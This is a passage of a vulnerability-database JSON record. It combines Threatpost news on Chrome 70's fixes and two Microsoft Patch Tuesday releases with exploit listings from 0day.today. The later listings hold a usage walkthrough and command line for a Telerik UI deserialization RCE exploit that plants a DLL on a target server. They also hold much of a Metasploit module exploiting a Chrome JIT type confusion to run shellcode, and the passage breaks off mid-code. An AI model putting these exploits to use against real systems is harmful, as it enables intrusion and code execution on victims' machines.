Chrome](<https://threatpost.com/googles-forced-sign-in-to-chrome-raises-privacy-red-flags/137651/>) when they signed into any other Google service.\n\nDigs at Google increased when a separate researcher also found that when he deleted the cookies.txt files in Chrome, the browser clears all cookies \u2013 except for Google cookies.\n\nBut the new control panel means that users have the option to turn off the automatic sign-in, Zach Koch, Chrome product manager, said in a [post](<https://www.blog.google/products/chrome/product-updates-based-your-feedback/>) on the matter.\n\n\u201cWhile we think sign-in consistency will help many of our users, we\u2019re adding a control that allows users to turn off linking web-based sign-in with browser-based sign-in\u2014that way users have more control over their experience,\u201d he said. \u201cFor users that disable this feature, signing into a Google website will not sign them into Chrome.\n\n## Fixed Vulnerabilities\n\nIn addition to new privacy features, Chrome 70 also [packs](<https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html>) 23 security fixes, including both \u201chigh\u201d and \u201cmedium\u201d priority bugs; as well as new security features.\n\nOf note are patches for a high-priority sandbox escape vulnerability (CVE-2018-17462) in AppCache; a high-priority remote code-execution flaw (CVE-2018-17463) in V8; a \u201chigh\u201d priority URL spoof bug (CVE-2018-17464) in Omnibox; and a \u201chigh\u201d memory corruption glitch (CVE-2018-17466) in Angle.\n\nOther bugs include a high-priority use-after-free flaw (CVE-2018-17465) in V8, and a high-priority heap buffer overflow vulnerability in Little CMS in PDFium (no CVE assigned yet).\n\nA full list of the security bugs and fixes are [here](<https://chromium.googlesource.com/chromium/src/+log/69.0.3497.100..70.0.3538.67?pretty=fuller&n=10000>).\n\nChrome 70 also features Web Bluetooth, which is also available in Windows 10, which allows sites to communicate with user-selected Bluetooth devices in a \u201csecure and privacy-preserving\u201d ways.\n\nAnd finally, Google released support for public key credentials in Chrome 70, which enables strong authentication to websites with public key cryptography, enabling password-less authentication and/or secure second-factor authentication without SMS texts.\n\n\u201cI\u2019m pretty excited about it because it allows sites to use my fingerprint for two-factor authentication,\u201d Pete LePage, developer advocate, said in a Tuesday [post](<https://developers.google.com/web/updates/2018/10/nic70>). \u201cBut, it also adds support for additional types of security keys and better security on the web.\u201d\n", "modified": "2018-10-17T14:04:48", "published": "2018-10-17T14:04:48", "id": "THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57", "href": "https://threatpost.com/on-heels-of-criticism-newly-released-google-chrome-70-prioritizes-privacy/138368/", "type": "threatpost", "title": "On Heels of Criticism, Newly-Released Google Chrome 70 Prioritizes Privacy", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T20:30:01", "bulletinFamily": "info", "cvelist": ["CVE-2020-16875", "CVE-2020-17095", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17142", "CVE-2020-17152", "CVE-2020-17158"], "description": "Microsoft has addressed 58 CVEs (nine of them critical) for its December 2020 Patch Tuesday update. This brings the computing giant\u2019s patch tally to 1,250 for the year \u2013 well beyond 2019\u2019s 840.\n\nThis month\u2019s security bugs affect Microsoft Windows, Edge (EdgeHTML-based), ChakraCore, Microsoft Office and Office Services and Web Apps, Exchange Server, Azure DevOps, Microsoft Dynamics, Visual Studio, Azure SDK and Azure Sphere, according to the update. None are listed as publicly known or under active attack. Also, no vulnerability was assigned a CVSSv3 severity score of 9.0 or higher.\n\n## **Critical Bug Breakdown**\n\nThree of the critical flaws are found in Microsoft Exchange (CVE-2020-17117, CVE-2020-17132 and CVE-2020-17142), all allowing remote code execution (RCE). [One of these](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) occurs due to improper validation of cmdlet arguments, according to Microsoft, which doesn\u2019t provide an attack scenario but does note that the attacker needs be authenticated with privileges.\n\n\u201cThis indicates that if you take over someone\u2019s mailbox, you can take over the entire Exchange server,\u201d according to Dustin Childs at Trend Micro\u2019s Zero Day Initiative (ZDI), writing in a [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/12/8/the-december-2020-security-update-review>). \u201cWith all of the other Exchange bugs, definitely prioritize your Exchange test and deployment.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAlso on the Exchange front, [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) addresses a patch bypass for CVE-2020-16875, which was reported and patched in September\u2019s Patch Tuesday release. While not critical, it\u2019s of note, Childs said.\n\nChilds also flagged [CVE-2020-17121](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17121>), one of two critical RCE bugs in Microsoft SharePoint (the other is [CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>)). Originally reported through ZDI program, the bug could allow an authenticated user to execute arbitrary .NET code on an affected server in the context of the SharePoint Web Application service account.\n\n\u201cIn its default configuration, authenticated SharePoint users are able to create sites that provide all of the necessary permissions that are prerequisites for launching an attack,\u201d Childs explained. \u201cSimilar bugs [patched earlier this year](<https://threatpost.com/microsofts-patch-tuesday-critical-rce-bugs/159044/>) received quite a bit of attention. We suspect this one will, too.\u201d\n\nIn fact, the Sharepoint CVEs should take patching priority, Immersive Labs\u2019 Kevin Breen, director of cyberthreat research, said via email. \u201cBoth are rated as critical as they have RCE, and Sharepoint can be used like a watering hole inside large organizations by an attacker,\u201d he said. \u201cAll it takes is for a few weaponized documents to be placed for malicious code to spread across an organization.\u201d\n\nAnother critical bug of note is tracked as [CVE-2020-17095](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17095>), a Hyper-V RCE vulnerability that allows an attacker to escalate privileges from code execution in a Hyper-V guest to code execution on the Hyper-V host by passing invalid vSMB packet data. The flaw carries the highest CVSS score in the update, coming in at 8.5, since no special permissions are needed to exploit it.\n\n\u201cTo exploit this vulnerability, an adversary could run a custom application on a Hyper-V guest that would cause the Hyper-V host operating system to allow arbitrary code execution when it fails to properly validate vSMB packet data,\u201d explained Automox researcher Jay Goodman, via email. \u201cThe vulnerability is present on most builds of Windows 10 and Windows Server 2004 and forward.\u201d\n\nTwo post-authentication RCE flaws in Microsoft Dynamics 365 for Finance and Operations (on-premises) ([CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) and [CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>)) round out the critical patches, along with a memory-corruption issue in the Chakra Scripting Engine, which impacts the Edge browser ([CVE-2020-17131](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17131>)).\n\n\u201cOnly one [of the critical-rated updates] (surprisingly) impacts the browser,\u201d Childs said. \u201cThat patch corrects a bug within the JIT compiler. By performing actions in JavaScript, an attacker can trigger a memory-corruption condition, which leads to code execution. The lack of browser updates could also be a conscious decision by Microsoft to ensure a bad patch for a browser does not disrupt online shopping during the holiday season.\u201d\n\nThough it\u2019s a lighter than usual month for the volume of patches, the steady flow of critical RCE bugs present a great deal of risk, said Justin Knapp, researcher at Automox, via email.\n\n\u201cInstead of having to manipulate a user to click a malicious link or attachment, bad actors merely have to target an unpatched system to gain initial access, at which point a number of methods can be employed to increase access to valuable assets,\u201d he said, referring to this month\u2019s critical RCE problems. \u201cIt goes without saying that the speed at which an organization can deploy these fixes will dictate the level of risk they take on.\u201d\n\n## **Other Bugs, Patching **\n\nIn addition to the critical bugs, a full 46 of the bugs are rated as important, and three are rated moderate in severity. The important bugs include 10 Office issues bugs impacting Outlook, PowerPoint and Excel \u2014 for these, Office 2019 versions for Mac do not have patches yet.\n\n\u201cThis is a book-end to a year that began with Microsoft addressing 49 CVEs in January of 2020, followed by eight consecutive months with over 90 CVEs addressed. In 2020, Microsoft released patches for over 1,200 CVEs,\u201d Satnam Narang, principal research engineer, Tenable, told Threatpost.\n\nPatching may be more difficult than ever going forward. \u201cOne of the things that stands out is that Microsoft has removed a lot of the detail they usually share with such advisories,\u201d Breen said. \u201cFor me, this could lead to some issues. Patching is not as easy as just clicking an update button and security teams like to gain a deeper understanding of what they are doing. Instead, however, they are expected to operate with less information.\u201d\n\nElsewhere, [Adobe issued patches](<https://threatpost.com/adobe-windows-macos-critical-severity-flaws/162007/>) for flaws tied to one important-rated and three critical-severity CVEs, during its regularly scheduled December security updates.\n\n\u201cWhile lighter than usual, the most severe allow for arbitrary code execution including three critical severity CVEs and one less severe (important-rated) flaw identified,\u201d Nick Colyer, researcher from Automox said. \u201cThe holidays present unique challenges to security teams\u2019 upcoming out-of-office time and the severity of the vulnerabilities Adobe has addressed are non-trivial against those challenges. It is important to prioritize any major vulnerabilities during holidays to reduce the threat surface exposed to would-be attackers.\u201d\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _**[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ on Dec. 16 at 2 p.m. ET. Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from John (Austin) Merritt, Cyber Threat Intelligence Analyst at Digital Shadows; Limor Kessem, Executive Security Advisor, IBM Security; and Israel Barak, CISO at Cybereason, on new kinds of attacks. Topics will include the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _**[**_Register here_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ for the Wed., Dec. 16 for this LIVE webinar._**\n\n**BONUS CONTENT: Download our exclusive **[**FREE Threatpost Insider eBook,**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) [_**Healthcare Security Woes Balloon in a Covid-Era World**_](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**, sponsored by ZeroNorth.**\n", "modified": "2020-12-08T20:23:30", "published": "2020-12-08T20:23:30", "id": "THREATPOST:02914A68EEB34D94544D5D00BF463BAC", "href": "https://threatpost.com/microsoft-patch-tuesday-holidays/162041/", "type": "threatpost", "title": "Microsoft Wraps Up a Lighter Patch Tuesday for the Holidays", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:40:13", "bulletinFamily": "info", "cvelist": ["CVE-2019-0859", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1352", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1471"], "description": "Microsoft has issued fixes for 36 CVEs for December 2019 Patch Tuesday across a range of products, with seven of them rated critical in severity \u2013 and one that\u2019s already being exploited in the wild as a zero-day bug.\n\nThe computing giant\u2019s [scheduled security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2019-Dec>) this month is relatively light, and includes patches for Microsoft Windows, Internet Explorer, Microsoft Office and related apps, SQL Server, Visual Studio and Skype for Business. In all, December Patch Tuesday addressed seven bugs that are rated critical, 28 that are rated important, and one that rated moderate in severity.\n\n## Zero-Day Bug Exploited in the Wild\n\n[CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&epi=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00>) is an elevation-of-privilege vulnerability in Win32k, which has a live zero-day exploit circulating in the wild. The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said.\n\n\u201cAn attacker could exploit the flaw to execute arbitrary code in kernel mode on the victim\u2019s system,\u201d said Satnam Narang, senior research engineer at Tenable, via email. \u201cFrom there, the attacker could perform a variety of actions, such as creating a new account with full user rights, installing programs, and viewing, changing or deleting data.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7725318633369800449?source=INART>)\n\nThe one caveat is that to exploit the flaw, an attacker would need to have previously compromised the system using another vulnerability \u2013 thus, it\u2019s rated only as important in severity and carries a CVSSv3 base score of 7.8 out of 10. However, since it has been exploited in the wild as a zero-day, IT security staff should prioritize the patch, researchers said.\n\n\u201cThis is one of many vulnerabilities that Microsoft resolved in 2019 that were being exploited but were not rated as a critical severity,\u201d said Chris Goettl, director of product management, Security, at Ivanti, via email. \u201cIf your vulnerability-management criteria use vendor severity or CVSS score as criteria for determining what should be updated, you should re-evaluate your criteria to ensure exploited vulnerabilities like this do not slip past your prioritization process.\u201d\n\nThe zero-day was found by Kaspersky researchers as a result of a separate zero-day exploit for Google Chrome that was seen in November, being used to execute arbitrary code on a victim\u2019s machine. The newly discovered Windows EoP was embedded into a previously discovered Google Chrome exploit, the firm said: \u201cIt was used to gain higher privileges in the infected machine as well as to escape the Chrome process sandbox \u2013 a component built to protect the browser and the victim\u2019s computer from malicious attacks.\u201d\n\nThe exploits are being used by a threat group called \u201cWizardOpium.\u201d\n\nMicrosoft has addressed the vulnerability by correcting how Win32k handles objects in memory. The flaw is also similar to the CVE-2019-0859 bug reported in April, for which an exploit was developed and found being sold on [underground markets](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>).\n\n## Critical Bugs\n\nIn terms of the critical bugs included in this month\u2019s Patch Tuesday, a critical remote code-execution (RCE) vulnerability in Win32k Graphics ([CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ&epi=je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsnx6wdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsnx6wdqz2h00>)) would allow an adversary to create a new account with full user rights, install programs, and view, change or delete data. It exists due to the Windows font library improperly handling specially crafted embedded fonts. Attack vectors would be via a malicious document, or by luring users to a specially crafted website containing the exploit code.\n\n\u201cTo exploit the vulnerability, an attacker would need to run a specially crafted application on the guest operating system, resulting in execution of arbitrary code on the host operating system,\u201d said Narang.\n\nAlso on the RCE front, critical-rated [CVE-2019-1471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1471>) in Windows Hyper-V exists due to improper validation of inputs from an authenticated user on the guest operating system by the host server.\n\n\u201cThis critical-rated patch fixes a bug in Hyper-V that would allow a user on a guest OS to execute arbitrary code on the underlying host OS,\u201d explained Dustin Childs, researcher with Trend Micro\u2019s Zero-Day Initiative. \u201cBugs like this have been demonstrated at Pwn2Own in the past, and they\u2019re always fun to watch. Considering how much modern computing depends on virtualization, it\u2019s likely we\u2019ll continue to see research that focuses on exploiting the hypervisor from a guest OS.\u201d\n\nMicrosoft also announced five critical vulnerabilities for Microsoft\u2019s Git for Visual Studio 2017 and 2019 (CVE-2019-1349, CVE-2019-1350, CVE-2019-1352, CVE-2019-1354, CVE-2019-1387).\n\nThe description for all of them [is identical:](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1349>) an RCE bug that exists when Git for Visual Studio client improperly sanitizes input (sanitization is the process of modifying input to ensure that it is actually valid).\n\n\u201cAs Visual Studio is one of the most popular development environments used today to design and build applications, this exploit puts engineering organizations on the front lines of a potential attack,\u201d explained Richard Melick, senior technology product manager at Automox, via email. \u201cIf left unpatched, engineering and development groups would be at risk to being the point of entry for malware deployment, lateral movement through the network, rogue account creation, and theft of proprietary application code.\u201d\n\nIn order to exploit any of these Visual Studio vulnerabilities, an attacker would need to use the Git client to download a malicious repository to the victim\u2019s endpoint.\n\n\u201cWhile not common, it is still possible using fairly simple techniques,\u201d Melick said. \u201cBy running intelligence gathering in channels like LinkedIn and job listings, an attacker could learn about an organization\u2019s use of Visual Studio and the details of the open-source projects in play. From there, entry into the network could come through a common phishing email technique to the engineering for help troubleshooting a compatibility issue with their open-source software, providing a link to the Git repository, or even for an interview as an example of previous work. The engineering team would then download the malicious repo, allowing the malicious code to execute, giving attacker access.\u201d\n\n## Additional Notes\n\nOne other bug that stood out to researchers in the update is [CVE-2019-1469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1469>), an important-rated Win32k information disclosure vulnerability that exists when a Win32k component improperly provides kernel information.\n\n\u201cA successful attack through this vulnerability could result in private data being revealed to an attacker, providing necessary information to further compromise the victim\u2019s system,\u201d Melick said. \u201cA successful attack relies on access to the machine to load a specially crafted application.\u201d\n\nAnd finally, it\u2019s also worth mentioning that there is only one Patch Tuesday left (in January) until Windows 7 and Server 2008\\2008 R2 reach end-of-life and Microsoft stops issuing security fixes for them.\n\n\u201cThere is no doubt we are going to see a similar situation to the Windows XP end-of-service with a large number of these machines still in use and not updated,\u201d Melick said. \u201cIt is safe to assume that many of these machines in this bucket are falling under unmanaged or mission-critical categories with no clear path to update.\u201d\n\nAlso on Patch Tuesday, [Adobe issued 17 critical vulnerabilities](<https://threatpost.com/adobe-fixes-critical-acrobat-photoshop-brackets-flaws/150970/>) in Acrobat Reader, Photoshop and Brackets, which could lead to arbitrary code execution if exploited.\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-10T21:21:24", "published": "2019-12-10T21:21:24", "id": "THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "href": "https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/", "type": "threatpost", "title": "Microsoft Zaps Actively Exploited Zero-Day Bug", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "edition": 1, "published": "2019-12-18T00:00:00", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33683"}, {"lastseen": "2020-03-06T15:10:14", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2020-03-06T00:00:00", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17463"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34054", "href": "https://0day.today/exploit/description/34054", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\r\n 'Description' => %q{\r\n This modules exploits a type confusion in Google Chromes JIT compiler.\r\n The Object.create operation can be used to cause a type confusion between a\r\n PropertyArray and a NameDictionary.\r\n The payload is executed within the rwx region of the sandboxed renderer\r\n process, so the browser must be run with the --no-sandbox option for the\r\n payload to work.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'saelo', # discovery and exploit\r\n 'timwr', # metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-17463'],\r\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\r\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'Platform' => ['windows', 'osx'],\r\n 'DefaultTarget' => 0,\r\n 'Targets' => [ [ 'Automatic', { } ] ],\r\n 'DisclosureDate' => 'Sep 25 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] \" + request.body)\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n\r\n jscript = %Q^\r\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\r\n\r\nlet ab = new ArrayBuffer(8);\r\nlet floatView = new Float64Array(ab);\r\nlet uint64View = new BigUint64Array(ab);\r\nlet uint8View = new Uint8Array(ab);\r\n\r\nNumber.prototype.toBigInt = function toBigInt() {\r\n floatView[0] = this;\r\n return uint64View[0];\r\n};\r\n\r\nBigInt.prototype.toNumber = function toNumber() {\r\n uint64View[0] = this;\r\n return floatView[0];\r\n};\r\n\r\nfunction hex(n) {\r\n return '0x' + n.toString(16);\r\n};\r\n\r\nfunction fail(s) {\r\n print('FAIL ' + s);\r\n throw null;\r\n}\r\n\r\nconst NUM_PROPERTIES = 32;\r\nconst MAX_ITERATIONS = 100000;\r\n\r\nfunction gc() {\r\n for (let i = 0; i < 200; i++) {\r\n new ArrayBuffer(0x100000);\r\n }\r\n}\r\n\r\nfunction make(properties) {\r\n let o = {inline: 42} // TODO\r\n for (let i = 0; i < NUM_PROPERTIES; i++) {\r\n eval(`o.p${i} = properties[${i}];`);\r\n }\r\n return o;\r\n}\r\n\r\nfunction pwn() {\r\n function find_overlapping_properties() {\r\n let propertyNames = [];\r\n for (let i = 0; i < NUM_PROPERTIES; i++) {\r\n propertyNames[i] = `p${i}`;\r\n }\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\r\n return [${propertyNames.join(', ')}];\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n for (let i = 1; i < NUM_PROPERTIES; i++) {\r\n propertyValues[i] = -i;\r\n }\r\n\r\n for (let i = 0; i < MAX_ITERATIONS; i++) {\r\n let r = vuln(make(propertyValues));\r\n if (r[1] !== -1) {\r\n for (let i = 1; i < r.length; i++) {\r\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\r\n return [i, -r[i]];\r\n }\r\n }\r\n }\r\n }\r\n\r\n fail(\"Failed to find overlapping properties\");\r\n }\r\n\r\n function addrof(obj) {\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n return o.p${p1}.x1;\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\r\n propertyValues[p2] = {y1: obj};\r\n\r\n let i = 0;\r\n for (; i < MAX_ITERATIONS; i++) {\r\n let res = vuln(make(propertyValues));\r\n if (res !== 13.37)\r\n return res.toBigInt()\r\n }\r\n\r\n fail(\"Addrof failed\");\r\n }\r\n\r\n function corrupt_arraybuffer(victim, newValue) {\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n let orig = o.p${p1}.x2;\r\n o.p${p1}.x2 = ${newValue.toNumber()};\r\n return orig;\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n let o = {x1: 13.37, x2: 13.38};\r\n propertyValues[p1] = o;\r\n propertyValues[p2] = victim;\r\n\r\n for (let i = 0; i < MAX_ITERATIONS; i++) {\r\n o.x2 = 13.38;\r\n let r = vuln(make(propertyValues));\r\n if (r !== 13.38)\r\n return r.toBigInt();\r\n }\r\n\r\n fail(\"Corrupt ArrayBuffer failed\");\r\n }\r\n\r\n let [p1, p2] = find_overlapping_properties();\r\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\r\n\r\n let memview_buf = new ArrayBuffer(1024);\r\n let driver_buf = new ArrayBuffer(1024);\r\n\r\n gc();\r\n\r\n let memview_buf_addr = addrof(memview_buf);\r\n memview_buf_addr--;\r\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\r\n\r\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\r\n\r\n let driver = new BigUint64Array(driver_buf);\r\n let original_memview_buf_ptr = driver[4];\r\n\r\n let memory = {\r\n write(addr, bytes) {\r\n driver[4] = addr;\r\n let memview = new Uint8Array(memview_buf);\r\n memview.set(bytes);\r\n },\r\n read(addr, len) {\r\n driver[4] = addr;\r\n let memview = new Uint8Array(memview_buf);\r\n return memview.subarray(0, len);\r\n },\r\n readPtr(addr) {\r\n driver[4] = addr;\r\n let memview = new BigUint64Array(memview_buf);\r\n return memview[0];\r\n },\r\n writePtr(addr, ptr) {\r\n driver[4] = addr;\r\n let memview = new BigUint64Array(memview_buf);\r\n memview[0] = ptr;\r\n },\r\n addrof(obj) {\r\n memview_buf.leakMe = obj;\r\n let props = this.readPtr(memview_buf_addr + 8n);\r\n return this.readPtr(props + 15n) - 1n;\r\n },\r\n };\r\n\r\n // Generate a RWX region for the payload\r\n function get_wasm_instance() {\r\n var buffer = new Uint8Array([\r\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\r\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\r\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\r\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\r\n ]);\r\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\r\n }\r\n\r\n let wasm_instance = get_wasm_instance();\r\n let wasm_addr 